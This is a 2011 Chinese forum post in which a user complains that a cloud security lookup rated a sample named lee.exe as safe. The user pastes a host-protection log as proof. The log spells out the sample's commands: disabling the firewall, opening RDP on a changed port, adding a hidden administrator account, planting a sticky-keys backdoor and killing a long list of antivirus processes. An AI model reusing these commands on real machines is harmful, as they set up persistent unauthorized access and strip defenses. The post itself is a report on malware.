病毒竟是安全的?
用
RS20110319151616500332
查询,病毒竟是安全的,拜托,这是病毒好不好
进程路径:E:\lee\lee.exe
文件路径:C:\Program Files\Common Files\sm.bat
触发规则:所有程序规则->%ProgramFiles%设置->%ProgramFiles%\Common Files\*
2011-03-18 21:11:24 运行应用程序 操作:允许
进程路径:E:\lee\lee.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c ""C:\Program Files\Common Files\sm.bat" "
触发规则:所有程序规则->系统程序设置->%windir%\system32\cmd.exe
2011-03-18 21:11:25 运行应用程序 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\net.exe
命令行:stop sharedaccess
触发规则:所有程序规则->系统程序设置->%windir%\system32\net*.exe
2011-03-18 21:11:25 运行应用程序 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\net1.exe
命令行:stop sharedaccess
触发规则:所有程序规则->系统程序设置->%windir%\system32\net*.exe
2011-03-18 21:11:25 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cacls.exe
命令行:C:\WINDOWS\System32\Wscript.exe /e /t /g everyone:F
触发规则:所有程序规则->系统程序设置->*\cacls.exe
2011-03-18 21:11:25 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cacls.exe
文件路径:C:\WINDOWS\System32\wscript.exe
触发规则:所有程序规则->需要保护的文件->%windir%\system32\*script.exe
2011-03-18 21:11:25 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cacls.exe
命令行:C:\WINDOWS\System32\cmd.exe /e /t /g everyone:F
触发规则:所有程序规则->系统程序设置->*\cacls.exe
2011-03-18 21:11:26 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cacls.exe
文件路径:C:\WINDOWS\System32\cmd.exe
触发规则:所有程序规则->WINDOWS文件设置->%windir%\system32\*.exe
2011-03-18 21:11:26 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cacls.exe
命令行:C:\WINDOWS\System32\net.exe /e /t /g everyone:F
触发规则:所有程序规则->系统程序设置->*\cacls.exe
2011-03-18 21:11:26 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cacls.exe
文件路径:C:\WINDOWS\System32\net.exe
触发规则:所有程序规则->WINDOWS文件设置->%windir%\system32\*.exe
2011-03-18 21:11:26 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cacls.exe
命令行:C:\WINDOWS\System32\net1.exe /e /t /g everyone:F
触发规则:所有程序规则->系统程序设置->*\cacls.exe
2011-03-18 21:11:26 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cacls.exe
文件路径:C:\WINDOWS\System32\net1.exe
触发规则:所有程序规则->WINDOWS文件设置->%windir%\system32\*.exe
2011-03-18 21:11:26 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cacls.exe
命令行:C:\WINDOWS\System32\ftp.exe /e /t /g everyone:F
触发规则:所有程序规则->系统程序设置->*\cacls.exe
2011-03-18 21:11:27 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cacls.exe
文件路径:C:\WINDOWS\System32\ftp.exe
触发规则:所有程序规则->WINDOWS文件设置->%windir%\system32\*.exe
2011-03-18 21:11:27 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cacls.exe
命令行:C:\WINDOWS\System32\dllcache\Wscript.exe /e /t /g everyone:F
触发规则:所有程序规则->系统程序设置->*\cacls.exe
2011-03-18 21:11:27 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cacls.exe
文件路径:C:\WINDOWS\System32\dllcache\wscript.exe
触发规则:所有程序规则->需要保护的文件->%windir%\system32\*script.exe
2011-03-18 21:11:27 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cacls.exe
命令行:C:\WINDOWS\System32\dllcache\cmd.exe /e /t /g everyone:F
触发规则:所有程序规则->系统程序设置->*\cacls.exe
2011-03-18 21:11:27 修改文件 操作:阻止并结束进程
进程路径:C:\WINDOWS\system32\cacls.exe
文件路径:C:\WINDOWS\System32\dllcache\cmd.exe
触发规则:所有程序规则->WINDOWS默认目录设置->%windir%\system32\dllcache\*
2011-03-18 21:11:27 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cacls.exe
命令行:C:\WINDOWS\System32\dllcache\net.exe /e /t /g everyone:F
触发规则:所有程序规则->系统程序设置->*\cacls.exe
2011-03-18 21:11:28 修改文件 操作:阻止并结束进程
进程路径:C:\WINDOWS\system32\cacls.exe
文件路径:C:\WINDOWS\System32\dllcache\net.exe
触发规则:所有程序规则->WINDOWS默认目录设置->%windir%\system32\dllcache\*
2011-03-18 21:11:28 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cacls.exe
命令行:C:\WINDOWS\System32\dllcache\net1.exe /e /t /g everyone:F
触发规则:所有程序规则->系统程序设置->*\cacls.exe
2011-03-18 21:11:28 修改文件 操作:阻止并结束进程
进程路径:C:\WINDOWS\system32\cacls.exe
文件路径:C:\WINDOWS\System32\dllcache\net1.exe
触发规则:所有程序规则->WINDOWS默认目录设置->%windir%\system32\dllcache\*
2011-03-18 21:11:28 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cacls.exe
命令行:C:\WINDOWS\System32\dllcache\ftp.exe /e /t /g everyone:F
触发规则:所有程序规则->系统程序设置->*\cacls.exe
2011-03-18 21:11:29 修改文件 操作:阻止并结束进程
进程路径:C:\WINDOWS\system32\cacls.exe
文件路径:C:\WINDOWS\System32\dllcache\ftp.exe
触发规则:所有程序规则->WINDOWS默认目录设置->%windir%\system32\dllcache\*
2011-03-18 21:11:30 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cacls.exe
命令行:c: /e /t /g everyone:F
触发规则:所有程序规则->系统程序设置->*\cacls.exe
2011-03-18 21:11:31 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cacls.exe
命令行:d: /e /t /g everyone:F
触发规则:所有程序规则->系统程序设置->*\cacls.exe
2011-03-18 21:11:31 运行应用程序 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\reg.exe
命令行:ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
触发规则:所有程序规则->系统程序设置->*\reg.exe
2011-03-18 21:11:31 运行应用程序 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\reg.exe
命令行:ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll- /f
触发规则:所有程序规则->系统程序设置->*\reg.exe
2011-03-18 21:11:31 运行应用程序 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\reg.exe
命令行:ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x8e6 /f
触发规则:所有程序规则->系统程序设置->*\reg.exe
2011-03-18 21:11:31 运行应用程序 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\reg.exe
命令行:ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x8e6 /f
触发规则:所有程序规则->系统程序设置->*\reg.exe
2011-03-18 21:11:41 运行应用程序 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\net.exe
命令行:user slx$ 101112@qq.tm /add
触发规则:所有程序规则->系统程序设置->%windir%\system32\net*.exe
2011-03-18 21:11:44 运行应用程序 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\net.exe
命令行:localgroup administrators slx$ /add
触发规则:所有程序规则->系统程序设置->%windir%\system32\net*.exe
2011-03-18 21:11:45 运行应用程序 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\net.exe
命令行:localgroup administradores slx$ /add
触发规则:所有程序规则->系统程序设置->%windir%\system32\net*.exe
2011-03-18 21:11:47 运行应用程序 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\net.exe
命令行:localgroup Администраторы slx$ /add
触发规则:所有程序规则->系统程序设置->%windir%\system32\net*.exe
2011-03-18 21:11:47 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\sethc.exe
触发规则:应用程序规则->WINDOWS文件设置->%windir%\system32\cmd.exe->%SystemDrive%\*
2011-03-18 21:11:47 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\sethc.exe
触发规则:应用程序规则->WINDOWS文件设置->%windir%\system32\cmd.exe->%SystemDrive%\*
2011-03-18 21:11:47 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\sethc.exe
触发规则:应用程序规则->WINDOWS文件设置->%windir%\system32\cmd.exe->%SystemDrive%\*
2011-03-18 21:11:47 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\sethc.exe
触发规则:应用程序规则->WINDOWS文件设置->%windir%\system32\cmd.exe->%SystemDrive%\*
2011-03-18 21:11:47 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\dllcache\sethc.exe
触发规则:应用程序规则->WINDOWS文件设置->%windir%\system32\cmd.exe->%SystemDrive%\*
2011-03-18 21:11:47 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\dllcache\sethc.exe
触发规则:应用程序规则->WINDOWS文件设置->%windir%\system32\cmd.exe->%SystemDrive%\*
2011-03-18 21:11:47 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\dllcache\sethc.exe
触发规则:应用程序规则->WINDOWS文件设置->%windir%\system32\cmd.exe->%SystemDrive%\*
2011-03-18 21:11:47 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\dllcache\sethc.exe
触发规则:应用程序规则->WINDOWS文件设置->%windir%\system32\cmd.exe->%SystemDrive%\*
2011-03-18 21:11:48 运行应用程序 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\attrib.exe
命令行:C:\WINDOWS\system32\sethc.exe +h
触发规则:所有程序规则->系统程序设置->*\attrib.exe
2011-03-18 21:11:48 运行应用程序 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\attrib.exe
命令行:C:\WINDOWS\system32\dllcache\sethc.exe +h
触发规则:所有程序规则->系统程序设置->*\attrib.exe
2011-03-18 21:11:48 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\sethc.exe
触发规则:应用程序规则->WINDOWS文件设置->%windir%\system32\cmd.exe->%SystemDrive%\*
2011-03-18 21:11:48 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\sethc.exe
触发规则:应用程序规则->WINDOWS文件设置->%windir%\system32\cmd.exe->%SystemDrive%\*
2011-03-18 21:11:48 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\sethc.exe
触发规则:应用程序规则->WINDOWS文件设置->%windir%\system32\cmd.exe->%SystemDrive%\*
2011-03-18 21:11:48 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\sethc.exe
触发规则:应用程序规则->WINDOWS文件设置->%windir%\system32\cmd.exe->%SystemDrive%\*
2011-03-18 21:11:48 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\dllcache\sethc.exe
触发规则:应用程序规则->WINDOWS文件设置->%windir%\system32\cmd.exe->%SystemDrive%\*
2011-03-18 21:11:48 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\dllcache\sethc.exe
触发规则:应用程序规则->WINDOWS文件设置->%windir%\system32\cmd.exe->%SystemDrive%\*
2011-03-18 21:11:48 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\dllcache\sethc.exe
触发规则:应用程序规则->WINDOWS文件设置->%windir%\system32\cmd.exe->%SystemDrive%\*
2011-03-18 21:11:48 修改文件 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\dllcache\sethc.exe
触发规则:应用程序规则->WINDOWS文件设置->%windir%\system32\cmd.exe->%SystemDrive%\*
2011-03-18 21:11:48 运行应用程序 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\attrib.exe
命令行:C:\WINDOWS\system32\sethc.exe +h
触发规则:所有程序规则->系统程序设置->*\attrib.exe
2011-03-18 21:11:48 运行应用程序 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\attrib.exe
命令行:C:\WINDOWS\system32\dllcache\sethc.exe +h
触发规则:所有程序规则->系统程序设置->*\attrib.exe
2011-03-18 21:11:48 运行应用程序 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\net.exe
命令行:STOP "ESET HTTP Server"
触发规则:所有程序规则->系统程序设置->%windir%\system32\net*.exe
2011-03-18 21:11:48 运行应用程序 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\net.exe
命令行:STOP "ESET Service"
触发规则:所有程序规则->系统程序设置->%windir%\system32\net*.exe
2011-03-18 21:11:48 运行应用程序 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\net.exe
命令行:STOP "Rav Service"
触发规则:所有程序规则->系统程序设置->%windir%\system32\net*.exe
2011-03-18 21:11:48 运行应用程序 操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\net.exe
命令行:STOP "Rsd Service"
触发规则:所有程序规则->系统程序设置->%windir%\system32\net*.exe
2011-03-18 21:11:53 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM 360sd.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:11:56 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM 360rp.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:11:59 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM 360tray.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:01 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM 360Safe.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:04 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM ZhuDongFangYu.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:06 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM egui.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:08 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM ekrn.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:10 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM knsdtray.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:12 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM knsdsvc.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:14 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM RavMonD.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:16 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM RsMgrSvc.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:18 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM RsTray.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:20 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM avgchsvx.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:22 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM avgnsx.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:24 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM avgrsx.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:26 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM avgcsrvx.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:28 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM avgtray.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:29 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM avgwdsvc.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:31 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM kxetray.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:33 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM kwsmain.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:35 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM kismain.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:36 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM KSafe.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:38 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM KSafeTray.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:41 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM upsvc.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:42 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM kisuisp.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:43 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM knsdave.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:45 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM kxescore.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:46 运行应用程序 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/F /IM kxesapp.exe
触发规则:所有程序规则->系统程序设置->%windir%\system32\taskkill.exe
2011-03-18 21:12:47 运行应用程序 操作:允许
进程路径:E:\lee\lee.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c ""C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7ZSfx000.cmd" "
触发规则:所有程序规则->系统程序设置->%windir%\system32\cmd.exe
2011-03-18 21:12:49 删除文件 操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:E:\lee\lee.exe
触发规则:应用程序规则->WINDOWS文件设置->%windir%\system32\cmd.exe->?:\*用户系统信息:Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.33 Safari/534.3 SE 2.X MetaSr 1.0
附件:
下载次数:338
文件类型:application/octet-stream
文件大小:
上传时间:2011-3-19 21:11:03
描述:rar
立刻回答 最后编辑于 2011-03-19 21:13:56
